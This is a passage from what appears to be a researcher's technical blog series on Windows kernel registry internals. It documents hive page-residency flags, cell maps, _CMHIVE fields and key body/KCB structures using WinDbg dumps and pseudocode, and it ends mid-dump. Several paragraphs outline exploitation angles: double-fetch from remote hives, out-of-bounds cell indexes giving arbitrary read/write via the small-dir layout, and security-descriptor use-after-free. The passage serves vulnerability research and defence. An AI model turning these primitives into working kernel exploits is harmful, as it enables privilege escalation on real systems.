so below is my attempt to name them and explain their meaning: Flag Value Description VIEW_PAGE_VALID 0x1 Indicates if the page is valid – true for pages between [ValidStartOffset, ValidEndOffset], false otherwise. If this flag is clear, all other flags are irrelevant/unused. The flag is set:When creating section views during hive loading, first the initial ones in HvpViewMapStart, and then the bin-specific ones in HvpRemapAndEnlistHiveBins.When extending an active hive in HvpViewMapExtendStorage. The flag is cleared:When trimming the existing views in HvpRemapAndEnlistHiveBins to make room for new ones.When shrinking the hive in HvpViewMapShrinkStorage. VIEW_PAGE_COW_BY_CALLER 0x2 Indicates if the kernel maintains a copy of the page through the copy-on-write (CoW) mechanism, as initiated by a client action, e.g. a registry operation that modified data in a cell and thus resulted in marking the page as dirty. The flag is set:When dirtying a hive cell, in HvpViewMapMakeViewRangeCOWByCaller. The flag is cleared:When flushing the registry changes to disk, in HvpViewMapMakeViewRangeUnCOWByCaller. VIEW_PAGE_COW_BY_POLICY 0x4 Indicates if the kernel maintains a copy of the page through the copy-on-write (CoW) mechanism, as required by the policy that all pages of non-local hives (hives loaded from volumes other than the system volume) must always remain in memory. The flag is set:In HvpViewMapMakeViewRangeValid, as an alternative way of keeping a local copy of the hive pages in memory (if locking fails, or the caller doesn't want the pages locked).In HvpViewMapMakeViewRangeCOWByCaller, when converting previously locked pages to the "CoW by policy" state.In HvpMappedViewConvertRegionFromLockedToCOWByPolicy, when lazily converting previously locked pages to the "CoW by policy" state in a thread that runs every 60 seconds (as indicated by CmpLazyLocalizeIntervalInSeconds). The flag is cleared:In HvpViewMapMakeViewRangeUnCOWByPolicy, which currently only ever seems to happen for hives loaded from the system volume, i.e. "\SystemRoot" and "\OSDataRoot", as listed in the global CmpWellKnownVolumeList array. VIEW_PAGE_WRITABLE 0x8 Indicates if the page is currently marked as writable, typically as a result of a modifying operation on the page that hasn't been yet flushed to disk. The flag is set:In HvpViewMapMakeViewRangeCOWByCaller, when marking a cell as dirty. The flag is cleared:In HvpViewMapMakeViewRangeUnCOWByCaller, when flushing the hive changes to disk.In HvpViewMapSealRange, when setting the memory as read-only for miscellaneous reasons (after performing log file recovery, etc.). VIEW_PAGE_LOCKED 0x10 Indicates if the page is currently locked in physical memory. The flag is set:In HvpViewMapMakeViewRangeValid if the caller requests page locking, and there is enough space left in the 64 MiB working set of the Registry process. In practice, this boils down to locking the initial 2 MiB hive mappings created in HvpViewMapStart for all app hives and for normal hives outside of the system disk volume. The flag is cleared:Whenever the state of the page changes to CoW-by-policy or Invalid in the following functions:HvpViewMapMakeViewRangeCOWByCallerHvpMappedViewConvertRegionFromLockedToCOWByPolicyHvpViewMapMakeViewRangeUnCOWByPolicyHvpViewMapMakeViewRangeInvalid The semantics of most of the flags are straightforward, but perhaps VIEW_PAGE_COW_BY_POLICY and VIEW_PAGE_LOCKED warrant a slightly longer explanation. The two flags are mutually exclusive, and they represent nearly identical ways to achieve the same goal: ensure that a copy of each hive page remains resident in memory or a pagefile. Under normal circumstances, the kernel could simply create the necessary section views in their default form, and let the memory management subsystem decide how to handle their pages most efficiently. However, one of the guarantees of the registry is that once a hive has been loaded, it must remain operational for as long as it is active in the system. On the other hand, section views have the property that (parts of) their underlying data may be completely evicted by the kernel, and later re-read from the original storage medium such as the hard drive. So, it is possible to imagine a situation where:A hive is loaded from a removable drive (e.g. a CD-ROM or flash drive) or a network share,Due to high memory pressure from other applications, some of the hive pages are evicted from memory,The removable drive with the hive file is ejected from the system,A client subsequently tries to operate on the hive, but parts of it are unavailable and cannot be fetched again from the original source. This could cause some significant problems and make the registry code fail in unexpected ways. It would also constitute a security vulnerability: the kernel assumes that once it has opened and sanitized the hive file, its contents remain consistent for as long as the hive is used. This is achieved by opening the file with exclusive access, but if the hive data was ever re-read by the Windows memory manager, a malicious removable drive or an attacker-controlled network share could ignore the exclusivity request and provide different, invalid data on the second read. This would result in a kind of "double fetch" condition and potentially lead to kernel memory corruption. To address both the reliability and security concerns, Windows makes sure to never evict pages corresponding to hives for which exclusive access cannot be guaranteed. This covers hives loaded from a location other than the system volume, and since Windows 10 19H1, also all app hives regardless of the file location. The first way to achieve this is by locking the pages directly in physical memory with a ZwLockVirtualMemory call. It is used for the initial ≤ 2 MiB section views created while loading a hive, up to the working set limit of the Registry process currently set at 64 MiB. The second way is by taking advantage of the copy-on-write mechanism – that is, marking the relevant pages as PAGE_WRITECOPY and subsequently touching each of them using the HvpViewMapTouchPages helper function. This causes the memory manager to create a private copy of each memory page containing the same data as the original, thus preventing them from ever being unavailable for registry operations. Between the two types of resident pages, the CoW type effectively becomes the default option in the long term. Eventually most pages converge to this state, even if they initially start as locked. This is because locked pages transition to CoW on multiple occasions, e.g. when converted by the background CmpDoLocalizeNextHive thread that runs every 60 seconds, or during the modification of a cell. On the other hand, once a page transitions to the CoW state, it never reverts to being locked. A diagram illustrating the transitions between the page residence states in a hive loaded from removable/remote storage is shown below: For normal hives loaded from the system volume (i.e. without the VIEW_MAP_MUST_BE_KEPT_LOCAL flag set), the state machine is much simpler: As a side note, CVE-2024-43452 was an interesting bug that exploited a flaw in the page residency protection logic. The bug arose because some data wasn't guaranteed to be resident in memory and could be fetched twice from a remote SMB share during bin mapping. This occurred early in the hive loading process, before page residency protections were fully in place. The kernel trusted the data from the second read without re-validation, allowing it to be maliciously set to invalid values, resulting in kernel memory corruption.Cell maps As discussed in Part 5, almost every cell contains references to other cells in the hive in the form of cell indexes. Consequently, virtually every registry operation involves multiple rounds of translating cell indexes into their corresponding virtual addresses in order to traverse the registry structure. Section views are stored in a red-black tree, so the search complexity is O(log n). This may seem decent, but if we consider that on a typical system, the registry is read much more often than it is extended/shrunk, it becomes apparent that it makes sense to further optimize the search operation at the cost of a less efficient insertion/deletion. And this is exactly what cell maps are: a way of trading a faster search complexity of O(1) for slower insertion/deletion complexity of O(n) instead of O(log n). Thanks to this technique, HvpGetCellPaged – perhaps the hottest function in the Windows registry implementation – executes in constant time. In technical terms, cell maps are pagetable-like structures that divide the 32-bit hive address space into smaller, nested layers consisting of so-called directories, tables, and entries. As a reminder, the layout of cell indexes and cell maps is illustrated in the diagram below, based on a similar diagram in the Windows Internals book, which itself draws from Mark Russinovich's 1999 article, Inside the Registry: Given the nature of the data structure, the corresponding cell map walk involves dereferencing three nested arrays based on the subsequent 1, 10 and 9-bit parts of the cell index, and then adding the final 12-bit offset to the page-aligned address of the target block. The internal kernel structures matching the respective layers of the cell map are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY, all publicly accessible via the ntoskrnl.exe PDB symbols. The entry point to the cell map is the Storage array at the end of the _HHIVE structure: 0: kd> dt _HHIVE nt!_HHIVE [...]    +0x118 Storage          : [2] _DUAL The index into the two-element array represents the storage type, 0 for stable and 1 for volatile, so a single _DUAL structure describes a 2 GiB view of a specific storage space: 0: kd> dt _DUAL nt!_DUAL    +0x000 Length           : Uint4B    +0x008 Map              : Ptr64 _HMAP_DIRECTORY    +0x010 SmallDir         : Ptr64 _HMAP_TABLE    +0x018 Guard            : Uint4B    +0x020 FreeDisplay      : [24] _FREE_DISPLAY    +0x260 FreeBins         : _LIST_ENTRY    +0x270 FreeSummary      : Uint4B Let's examine the semantics of each field: Length: Expresses the current length of the given storage space in bytes. Directly after loading the hive, the stable length is equal to the size of the hive on disk (including any data recovered from log files, minus the 4096 bytes of the header), and the volatile space is empty by definition. Only cell map entries within the [0, Length - 1] range are guaranteed to be valid.Map: Points to the actual directory structure represented by _HMAP_DIRECTORY.SmallDir: Part of the "small dir" optimization, discussed in the next section.Guard: Its specific role is unclear, as the field is always initialized to 0xFFFFFFFF upon allocation and never used afterwards. I expect that it is some kind of debugging remnant from the early days of the registry development, presumably related to the small dir optimization.FreeDisplay: A data structure used to optimize searches for free cells during the cell allocation process. It consists of 24 buckets, each corresponding to a specific cell size range and represented by the _FREE_DISPLAY structure, indicating which pages in the hive may potentially contain free cells of the given length.FreeBins: The head of a doubly-linked list that links the descriptors of entirely empty bins in the hive, represented by the _FREE_HBIN structures.FreeSummary: A bitmask indicating which buckets within FreeDisplay have any hints set for the given cell size. A zero bit at a given position means that there are no free cells of the specific size range anywhere in the hive. The next level in the cell map hierarchy is the _HMAP_DIRECTORY structure: 0: kd> dt _HMAP_DIRECTORY nt!_HMAP_DIRECTORY    +0x000 Directory        : [1024] Ptr64 _HMAP_TABLE As we can see, it is simply a 1024-element array of pointers to _HMAP_TABLE: 0: kd> dt _HMAP_TABLE nt!_HMAP_TABLE    +0x000 Table            : [512] _HMAP_ENTRY Further, we get a 512-element array of pointers to the final level of the cell map, _HMAP_ENTRY: 0: kd> dt _HMAP_ENTRY nt!_HMAP_ENTRY    +0x000 BlockOffset      : Uint8B    +0x008 PermanentBinAddress : Uint8B    +0x010 MemAlloc         : Uint4B This last level contains a descriptor of a single page in the hive and warrants a deeper analysis. Let's start by noting that the four least significant bits of PermanentBinAddress correspond to a set of undocumented flags that control various aspects of the page behavior. I was able to reverse-engineer them and partially recover their names, largely thanks to the fact that some older Windows 10 builds contained non-inlined functions operating on these flags, with revealing names like HvpMapEntryIsDiscardable or HvpMapEntryIsTrimmed: enum _MAP_ENTRY_FLAGS {   MAP_ENTRY_NEW_ALLOC   = 0x1,   MAP_ENTRY_DISCARDABLE = 0x2,   MAP_ENTRY_TRIMMED     = 0x4,   MAP_ENTRY_DUMMY       = 0x8, }; Here's a brief summary of their meaning based on my understanding: MAP_ENTRY_NEW_ALLOC: Indicates that this is the first page of a bin. Cell indexes pointing into this page must specify an offset within the range of [0x20, 0xFFF], as they cannot fall into the first 32 bytes that correspond to the _HBIN structure.MAP_ENTRY_DISCARDABLE: Indicates that the whole bin is empty and consists of a single free cell.MAP_ENTRY_TRIMMED: Indicates that the page has been marked as "trimmed" in HvTrimHive. More specifically, this property is related to hive reorganization, and is set during the loading process on some number of trailing pages that only contain keys accessed during boot, or not accessed at all since the last reorganization. The overarching goal is likely to prevent introducing unnecessary fragmentation in the hive by avoiding mixing together keys with different access histories.MAP_ENTRY_DUMMY: Indicates that the page is allocated from the kernel pool and isn't part of a section view. With this in mind, let's dive into the details of each _HMAP_ENTRY structure member: PermanentBinAddress: The lower 4 bits contain the above flags. The upper 60 bits represent the base address of the bin mapping corresponding to this page.BlockOffset: This field has a dual functionality. If the MAP_ENTRY_DISCARDABLE flag is set, it is a pointer to a descriptor of a free bin, _FREE_HBIN, linked into the _DUAL.FreeBins linked list. If it is clear (the typical case), it expresses the offset of the page relative to the start of the bin. Therefore, the virtual address of the block's data in memory can be calculated as (PermanentBinAddress & (~0xF)) + BlockOffset.MemAlloc: If the MAP_ENTRY_NEW_ALLOC flag is set, it contains the size of the bin, otherwise it is zero. And this concludes the description of how cell maps are structured. Taking all of it into account, the implementation of the HvpGetCellPaged function starts to make a lot of sense. Its pseudocode comes down to the following: _CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {   _HMAP_ENTRY *Entry = &Hive->Storage[Index >> 31].Map                             ->Directory[(Index >> 21) & 0x3FF]                             ->Table[(Index >> 12) & 0x1FF];   return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4; } The same process is followed, for example, by the implementation of the WinDbg !reg cellindex extension, which also translates a pair of a hive pointer and a cell index into the virtual address of the cell.The small dir optimization There is one other implementation detail about the cell maps worth mentioning here – the small dir optimization. Let's start with the observation that a majority of registry hives in Windows are relatively small, below 2 MiB in size. This can be easily verified by using the !reg hivelist command in WinDbg, and taking note of the values in the "Stable Length" and "Volatile Length" columns. Most of them usually contain values between several kilobytes to hundreds of kilobytes. This would mean that if the kernel allocated the full first-level directory for these hives (taking up 1024 entries × 8 bytes = 8 KiB on 64-bit platforms), they would still only use the first element in it, leading to a non-trivial waste of memory – especially in the context of the early 1990's when the registry was first implemented. In order to optimize this common scenario, Windows developers employed an unconventional approach to simulate a 1-item long "array" with the SmallDir member of type _HMAP_TABLE in the _DUAL structure, and have the _DUAL.Map pointer point at it instead of a separate pool allocation when possible. Later, whenever the hive grows and requires more than one element of the cell map directory, the kernel falls back to the standard behavior and performs a normal pool allocation for the directory array. A revised diagram illustrating the cell map layout of a small hive is shown below: Here, we can see that indexes 1 through 1023 of the directory array are invalid. Instead of correctly initialized _HMAP_TABLE structures, they point into "random" data corresponding to other members of the _DUAL and the larger _CMHIVE structure that happen to be located after _DUAL.SmallDir. Ordinarily, this is merely a low-level detail that doesn't have any meaningful implications, as all actively loaded hives remain internally consistent and always contain cell indexes that remain within the bounds of the hive's storage space. However, if we look at it through the security lens of hive-based memory corruption, this behavior suddenly becomes very interesting. If an attacker was able to implant an out-of-bounds cell index with the directory index greater than 0 into a hive, they would be able to get the kernel to operate on invalid (but deterministic) data as part of the cell map walk, and enable a powerful arbitrary read/write primitive. In addition to the small dir optimization, this technique is also enabled by the fact that the HvpGetCellPaged routine doesn't perform any bounds checks of the cell indexes, instead blindly trusting that they are always valid. If you are curious to learn more about the exploitation aspect of out-of-bounds cell indexes, it was the main subject of my Practical Exploitation of Registry Vulnerabilities in the Windows Kernel talk given at OffensiveCon 2024 (slides and video recording are available). I will also discuss it in more detail in one of the future blog posts focused specifically on the security impact of registry vulnerabilities._CMHIVE structure overview Beyond the first member of type _HHIVE at offset 0, the _CMHIVE structure contains more than 3 KiB of further information describing an active hive. This data relates to concepts more abstract than memory management, such as the registry tree structure itself. Below, instead of a field-by-field analysis, we'll focus on the general categories of information within _CMHIVE, organized loosely by increasing complexity of the data structures: Reference count: a 32-bit refcount primarily used during short-term operations on the hive, to prevent the object from being freed while actively operated on. These are used by the thin wrappers CmpReferenceHive and CmpDereferenceHive.File handles and sizes: handles and current sizes of the hive files on disk, such as the main hive file (.DAT) and the accompanying log files (.LOG, .LOG1, .LOG2). The handles are stored in FileHandles array, and the sizes reside in ActualFileSize and LogFileSizes.Text strings: some informational strings that may prove useful when trying to identify a hive based on its _CMHIVE structure. For example, the hive file name is stored in FileUserName, and the hive mount point path is stored in HiveRootPath.Timestamps: there are several timestamps that can be found in the hive descriptor, such as DirtyTime, UnreconciledTime or LastWriteTime.List entries: instances of the _LIST_ENTRY structure used to link the hive into various double-linked lists, such as the global list of hives in the system (HiveList, starting at nt!CmpHiveListHead), or the list of hives within a common trust class (TrustClassEntry).Synchronization mechanisms: various objects used to synchronize access to the hive as a whole, or some of its parts. Examples include HiveRundown, SecurityLock and HandleClosePendingEvent.Unload history: a 128-element array that stores the number of steps that have been successfully completed in the process of unloading the hive. Its specific purpose is unclear, it might be a debugging artifact retained from older versions of Windows.Late unload state: objects related to deferred unloading of registry hives (LateUnloadWorkItemState, LateUnloadFinishedEvent, LateUnloadWorkItem).Hive layout information: the hive reorganization process in Windows tries to optimize hives by grouping together keys accessed during system runtime, followed by keys accessed during system boot, followed by completely unused keys. If a hive is structured according to this order during load, the kernel saves information about the boundaries between the three distinct areas in the BootStart, UnaccessedStart and UnaccessedEnd members of _CMHIVE.Flushing state and dirty block information: any state that has to do with marking cells as dirty and synchronizing their contents to disk. There are a significant number of fields related to the functionality, with names starting with "Flush...", "Unreconciled..." and "CapturedUnreconciled...".Volume context: a pointer to a public _CMP_VOLUME_CONTEXT structure, which provides extended information about the disk volume of the hive file. As an example, it is used in the internal CmpVolumeContextMustHiveFilePagesBeKeptLocal routine to determine whether the volume is a system one, and consequently whether certain security/reliability assumptions are guaranteed for it or not.KCB table and root KCB: a table of the globally visible KCB (Key Control Block) structures corresponding to keys in the hive, and a pointer to the root key's KCB. I will discuss KCBs in more detail in the "Key structures" section below.Security descriptor cache: a cache of all security descriptors present in the hive, allocated from the kernel pool and thus accessible more efficiently than the underlying hive mappings. In my bug reports, I have often taken advantage of the security cache as a straightforward way to demonstrate the exploitability of security descriptor use-after-frees. A security node UAF can be easily converted into an UAF of its pool-based cached object, which then reliably triggers a Blue Screen of Death when Special Pool is enabled. The security cache of any given hive can be enumerated using the !reg seccache command in WinDbg.Transaction-related objects: a pointer to a _CM_RM structure that describes the Resource Manager object associated with the hive, if "heavyweight" transactions (i.e. KTM transactions) are enabled for it. Last but not least, _CMHIVE has its own Flags field that is different from _HHIVE.Flags. As usual, the flags are not documented, so the listing below is a product of my own analysis: enum _CM_HIVE_FLAGS {   CM_HIVE_UNTRUSTED                 = 0x1,   CM_HIVE_IN_SID_MAPPING_TABLE      = 0x2,   CM_HIVE_HAS_RM                    = 0x8,   CM_HIVE_IS_VIRTUALIZABLE          = 0x10,   CM_HIVE_APP_HIVE                  = 0x20,   CM_HIVE_PROCESS_PRIVATE           = 0x40,   CM_HIVE_MUST_BE_REORGANIZED       = 0x400,   CM_HIVE_DIFFERENCING_WRITETHROUGH = 0x2000,   CM_HIVE_CLOUDFILTER_PROTECTED     = 0x10000, }; A brief description of each of them is as follows:CM_HIVE_UNTRUSTED: the hive is "untrusted" in the sense of registry symbolic links; in other words, it is not one of the default system hives loaded on boot. The distinction is that trusted hives can freely link to all other hives in the system, while untrusted ones can only link to hives within their so-called trust class. This is to prevent confused deputy-style privilege escalation attacks in the system.CM_HIVE_IN_SID_MAPPING_TABLE: the hive is linked into an internal data structure called the "SID mapping table" (nt!CmpSIDToHiveMapping), used to efficiently look up the user class hives mounted at \Registry\User\_Classes for the purposes of registry virtualization. CM_HIVE_HAS_RM: KTM transactions are enabled for this hive, meaning that the corresponding .blf and .regtrans-ms files are present in the same directory as the main hive file. The flag is clear if the hive is an app hive or if it was loaded with the REG_HIVE_NO_RM flag set.CM_HIVE_IS_VIRTUALIZABLE: accesses to this hive may be subject to registry virtualization. As far as I know, the only hive with this flag set is currently HKLM\SOFTWARE, which seems in line with the official documentation.CM_HIVE_APP_HIVE: this is an app hive, i.e. it was loaded under \Registry\A with the REG_APP_HIVE flag set.CM_HIVE_PROCESS_PRIVATE: this hive is private to the loading process, i.e. it was loaded with the REG_PROCESS_PRIVATE flag set.CM_HIVE_MUST_BE_REORGANIZED: the hive fragmentation threshold (by default 1 MiB) has been exceeded, and the hive should undergo the reorganization process at the next opportunity. The flag is simply a means of communication between the CmCheckRegistry and CmpReorganizeHive internal routines, both of which execute during hive loading.CM_HIVE_DIFFERENCING_WRITETHROUGH: this is a delta hive loaded in the writethrough mode, which technically means that the DIFF_HIVE_WRITETHROUGH flag was specified in the DiffHiveFlags member of the VRP_LOAD_DIFFERENCING_HIVE_INPUT structure, as discussed in Part 4.CM_HIVE_CLOUDFILTER_PROTECTED: new flag added in December 2024 as part of the fix for CVE-2024-49114. It indicates that the hive file has been protected against being converted to a Cloud Filter placeholder by setting the "$Kernel.CFDoNotConvert" extended attribute (EA) on the file in CmpAdjustFileCFSafety. This concludes the documentation of the hive descriptor structure, arguably the largest and most complex object in the Windows registry implementation. Key structures The second most important objects in the registry are keys. They can be basically thought of as the essence of the registry, as nearly every registry operation involves them in some way. They are also the one and only registry element that is tightly integrated with the Windows NT Object Manager. This comes with many benefits, as client applications can operate on the registry using standardized handles, and can leverage automatic security checks and object lifetime management. However, this integration also presents its own challenges, as it requires the Configuration Manager to interact with the Object Manager correctly and handle its intricacies and edge cases securely. For this reason, internal key-related structures play a crucial role in the registry implementation. They help organize key state in a way that simplifies keeping it up-to-date and internally consistent. For security researchers, understanding these structures and their semantics is invaluable. This knowledge enables you to quickly identify bugs in existing code or uncover missing handling of unusual but realistic conditions. The two fundamental key structures in the Windows kernel are the key body (_CM_KEY_BODY) and key control block (_CM_KEY_CONTROL_BLOCK). The key body is directly associated with a key handle in the NT Object Manager, similar to the role that the _FILE_OBJECT structure plays for file handles. In other words, this is the initial object that the kernel obtains whenever it calls ObReferenceObjectByHandle to reference a user-supplied handle. There may concurrently exist a number of key body structures associated with a single key, as long as there are several programs holding active handles to the key. Conversely, the key control block represents the global state of a specific key and is used to manage its general properties. This means that for most keys in the system, there is at most one KCB allocated at a time. There may be no KCB for keys that haven't been accessed yet (as they are initialized by the kernel lazily), and there may be more than one KCB for the same registry path if the key has been deleted and created again (these two instances of the key are treated as separate entities, with one of them being marked as deleted/non-existent). Taking this into account, the relationship between key bodies and KCBs is many-to-one, with all of the key bodies of a single KCB being connected in a doubly-linked list, as shown in the diagram below: The following subsections provide more detail about each of these two structures.Key body The key body structure is allocated and initialized in the internal CmpCreateKeyBody routine, and freed by the NT Object Manager when all references to the object are dropped. It is a relatively short and simple object with the following definition: 0: kd> dt _CM_KEY_BODY nt!_CM_KEY_BODY    +0x000 Type             : Uint4B    +0x004 AccessCheckedLayerHeight : Uint2B    +0x008 KeyControlBlock  : Ptr64 _CM_KEY_CONTROL_BLOCK    +0x010 NotifyBlock      : Ptr64 _CM_NOTIFY_BLOCK    +0x018 ProcessID        : Ptr64 Void    +0x020 KeyBodyList      : _LIST_ENTRY    +0x030 Flags            : Pos 0, 16 Bits    +0x030 HandleTags       : Pos 16, 16 Bits    +0x038 Trans            : _CM_TRANS_PTR    +0x040 KtmUow           : Ptr64 _GUID    +0x048 ContextListHead  : _LIST_ENTRY    +0x058 EnumerationResumeContext : Ptr64 Void    +0x060 RestrictedAccessMask : Uint4B    +0x064 LastSearchedIndex : Uint4B    +0x068 LockedMemoryMdls : Ptr64 Void Let's quickly go over each field:Type: for normal keys (i.e. almost all of them), this field is set to a magic value of 0x6B793032 ('ky02'). However, for predefined keys, this is the 32-bit value of the link's target key with the highest bit set. This member is therefore used to distinguish between regular keys and predefined ones, for example in CmObReferenceObjectByHandle. Predefined keys have been now largely deprecated, but it is still possible to observe a non-standard Type value by opening a handle to one of the two last remaining ones: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Perflib\009 and CurrentLanguage under the same path.AccessCheckedLayerHeight: a new field added in November 2023 as part of the fix for CVE-2023-36404. It is used for layered keys and contains the index of the lowest layer in the key stack that was access-checked when opening the key. It is later taken into account during other registry operations, in order to avoid leaking data from lower-layer, more restrictive keys that could have been created since the handle was opened.KeyControlBlock: a pointer to the corresponding key control block.NotifyBlock: an optional pointer to the notify block associated with this handle. This is related to the key notification functionality in Windows and is described in more detail in the "Key notification structures" section below.ProcessID: the PID of the process that created the handle. It doesn't seem to serve any purpose in the kernel other than to be enumerable using the NtQueryOpenSubKeysEx system call (which requires SeRestorePrivilege, and is therefore available to administrators only).KeyBodyList: the list entry used to link all the key bodies within a single KCB together.Flags: a set of flags concerning the specific key body. Here's my interpretation of them based on reverse engineering:KEY_BODY_HIVE_UNLOADED (0x1): indicates that the underlying hive of the key has been unloaded and is no longer active.KEY_BODY_DONT_RELOCK (0x2): this seems to be a short-term flag used to communicate between CmpCheckKeyBodyAccess/CmpCheckOpenAccessOnKeyBody and the nested CmpDoQueryKeyName routine, in order to indicate that the key's KCB is already locked and shouldn't be relocked again.KEY_BODY_DONT_DEINIT (0x4): if this flag is set, CmpDeleteKeyObject returns early and doesn't proceed with the regular deinitialization of the key body object. However, it is unclear if/where the flag is set in the code, as I personally haven't found any instances of it happening during my analysis.KEY_BODY_DELETED (0x8): indicates that the key has been deleted since the handle was opened, and it no longer exists.KEY_BODY_DONT_VIRTUALIZE (0x10): indicates that registry virtualization is disabled for this handle, as a result of opening the key with the (undocumented but present in SDK headers) REG_OPTION_DONT_VIRTUALIZE flag.HandleTags: from the kernel perspective, this is simply a general purpose 16-bit storage that can be set by clients on a per-handle basis using NtSetInformationKey with the KeySetHandleTagsInformation information class, and queried with NtQueryKey and the KeyHandleTagsInformation information class. As far as I know, the kernel doesn't dictate how this field should be used and leaves it up to the registry clients. In practice, it seems to be mostly used for purposes related to WOW64 and the Registry Redirector, storing flags such as KEY_WOW64_64KEY (0x100) and KEY_WOW64_32KEY (0x200), as well as some internal ones. The WOW64 functionality is implemented in KernelBase.dll, and functions such as ConstructKernelKeyPath and LocalBaseRegOpenKey are a good starting point for reverse engineering, if you're curious to learn more. I have also observed the 0x1000 handle tag being set in the internal IopApplyMutableTagToRegistryKey kernel routine for keys such as HKLM\System\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000, but I'm unsure of its meaning.Trans: Indicates the transactional state of the handle. If the handle is not transacted (i.e. it wasn't opened with one of RegOpenKeyTransacted or RegCreateKeyTransacted), it is set to zero. Otherwise, the lowest bit specifies the type of the transaction: 0 for KTM and 1 for lightweight transactions. The remaining bits form a pointer to the associated transaction object, either of the TmTransactionObjectType type (represented by the _KTRANSACTION structure), or of the CmRegistryTransactionType type (represented by a non-public structure that I've personally named _CM_LIGHTWEIGHT_TRANS_OBJECT).KtmUow: if the handle is associated with a KTM transaction, this field stores the GUID that uniquely identifies it. For non-transacted and lightweight-transacted handles, the field is unused.ContextListHead: this is the head of the doubly-linked list of contexts that have been associated with the key body using the CmSetCallbackObjectContext function. It is related to the registry callbacks functionality; see also the Specifying Context Information MSDN article for more details.EnumerationResumeContext: this is part of an optimization of the subkey enumeration process of layered keys (implemented in CmpEnumerateLayeredKey). Performing full enumeration of a layered key from scratch up to the given index is a very complex task, and repeating it over and over for each iteration of an enumeration loop would be very inefficient. The resume context helps address the problem for sequential enumeration by saving the intermediate state reached at an NtEnumerateKey call with a given index, and being able to resume from it when a request for index+1 comes next. It also has the added benefit of making it possible to stop and restart the enumeration process in the scope of a single system call, which is used to pause the operation and temporarily release some locks if the code detects that the registry is particularly congested. This happens at the intersection of the CmEnumerateKey and CmpEnumerateLayeredKey functions, with the latter potentially returning STATUS_RETRY and the former resuming the operation if such a situation arises.RestrictedAccessMask, LastSearchedIndex, LockedMemoryMdls: relatively new fields introduced in Windows 10 and 11, which I haven't looked very deeply into and thus won't discuss in detail here. After a key handle is translated into the corresponding _CM_KEY_BODY structure using the ObReferenceObjectByHandle(CmKeyObjectType) call, typically early in the execution of a registry-related system call, there are three primary operations that are usually performed. First, the kernel does a key status check by evaluating the expression KeyBody.Flags & 9 to determine if the key is associated with an unloaded hive (flag 0x1) or has been deleted (flag 0x8). This check is essential because most registry operations are only permitted on active, existing keys, and enforcing this condition is a fundamental step for guaranteeing registry state consistency. Second, the code accesses the KeyControlBlock pointer, which provides further access to the hive pointer (KCB.KeyHive), the key's cell index (KCB.KeyCell), and other necessary fields and data structures required to perform any meaningful read/write actions on the key. Finally, the code checks the key body's Trans/KtmUow members to determine if the handle is part of a transaction, and if so, the transaction is used as additional context for the action requested by the caller. Accesses to other members of the _CM_KEY_BODY structure are less frequent and serve more specialized purposes.Key control block The key control block object can be thought of as the heart of the Windows kernel registry tree representation. It is effectively the descriptor of a single key in the system, and the second most important key-related object after the key node. It is always allocated from the kernel pool, and serves four main purposes: Mirrors frequently used information from the key node to make it faster to access by the kernel code. This includes building an efficient, in-memory representation of the registry tree to optimize the traversal time when referring to registry paths.Works as a single point of reference for all active handles to a specific key, and helps synchronize access to the key in the multithreaded Windows environment.Represents any pending, transacted state of the registry key that has been introduced by a client, but not fully committed yet.Represents any complex relationships between registry keys that extend beyond the internal structure of the hive. The primary example are differencing hives, which are overlaid on top of each other, and whose corresponding keys form so-called key stacks. Blog post #2 in this series highlighted the dramatic growth of the registry codebase across successive Windows versions, illustrating the subsystem's steady expansion over the last few decades. Similarly, the size of the Key Control Block (KCB) itself has nearly doubled in time, from 168 bytes in Windows XP x64 to 312 bytes in the latest Windows 11 release. This expansion underscores the increasing amount of information associated with every registry key, which the kernel must manage consistently and securely. The KCB structure layout is present in the PDB symbols and can be displayed in WinDbg: 0: kd> dt _CM_KEY_CONTROL_BLOCK nt!_CM_KEY_CONTROL_BLOCK    +0x000 RefCount         : Uint8B    +0x008 ExtFlags         : Pos 0, 16 Bits    +0x008 Freed            : Pos 16, 1 Bit    +0x008 Discarded        : Pos 17, 1 Bit    +0x008 HiveUnloaded     : Pos 18, 1 Bit    +0x008 Decommissioned   : Pos 19, 1 Bit    +0x008 SpareExtFlag     : Pos 20, 1 Bit    +0x008 TotalLevels      : Pos 21, 10 Bits    +0x010 KeyHash          : _CM_KEY_HASH    +0x010 ConvKey          : _CM_PATH_HASH    +0x018 NextHash         : Ptr64 _CM_KEY_HASH    +0x020 KeyHive          : Ptr64 _HHIVE    +0x028 KeyCell          : Uint4B    +0x030 KcbPushlock      : _EX_PUSH_LOCK    +0x038 Owner            : Ptr64 _KTHREAD    +0x038 SharedCount      : Int4B    +0x040 DelayedDeref     : Pos 0, 1 Bit    +0x040 DelayedClose     : Pos 1, 1 Bit    +0x040 Parking          : Pos 2, 1 Bit    +0x041 LayerSemantics   : UChar    +0x042 LayerHeight      : Int2B    +0x044 Spare1           : Uint4B    +0x048 ParentKcb        : Ptr64 _CM_KEY_CONTROL_BLOCK    +0x050 NameBlock        : Ptr64 _CM_NAME_CONTROL_BLOCK    +0x058 CachedSecurity   : Ptr64 _CM_KEY_SECURITY_CACHE    +0x060 ValueList        : _CHILD_LIST    +0x068 LinkTarget       : Ptr64 _CM_KEY_CONTROL_BLOCK    +0x070 IndexHint        : Ptr64 _CM_INDEX_HINT_BLOCK    +0x070 HashKey          : Uint4B    +0x070 SubKeyCount      : Uint4B    +0x078 KeyBodyListHead  : _LIST_ENTRY    +0x078 ClonedListEntry  : _LIST_ENTRY    +0x088 KeyBodyArray     : [4] Ptr64 _CM_KEY_BODY    +0x0a8 KcbLastWriteTime : _LARGE_INTEGER    +0x0b0 KcbMaxNameLen    : Uint2B    +0x0b2 KcbMaxValueNameLen : Uint2B    +0x0b4 KcbMaxValueDataLen : Uint4B    +0x0b8 KcbUserFlags     : Pos 0, 4 Bits    +0x0b8 KcbVirtControlFlags : Pos 4, 4 Bits    +0x0b8 KcbDebug         : Pos 8, 8 Bits    +0x0b8 Flags            : Pos 16, 16 Bits    +0x0bc Spare3           : Uint4B    +0x0c0 LayerInfo        : Ptr64 _CM_KCB_LAYER_INFO    +0x0c8 RealKeyName      : Ptr64 Char    +0x0d0 KCBUoWListHead   : _LIST_ENTRY    +0x0e0 DelayQueueEntry  : _LIST_ENTRY    +0x0e0 